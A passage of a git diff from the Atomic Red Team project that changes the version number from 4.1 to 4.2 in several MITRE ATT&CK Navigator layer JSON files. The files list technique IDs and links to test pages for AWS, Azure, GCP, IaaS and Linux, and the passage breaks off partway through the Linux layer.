-{"version":"4.1","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json index 046918fc..89eec315 100644 
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json index 0a1bfbf4..81629dab 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json index b6136576..df846570 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 09d2ec05..47f5e3e8 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"technique
ID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/a
tomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.
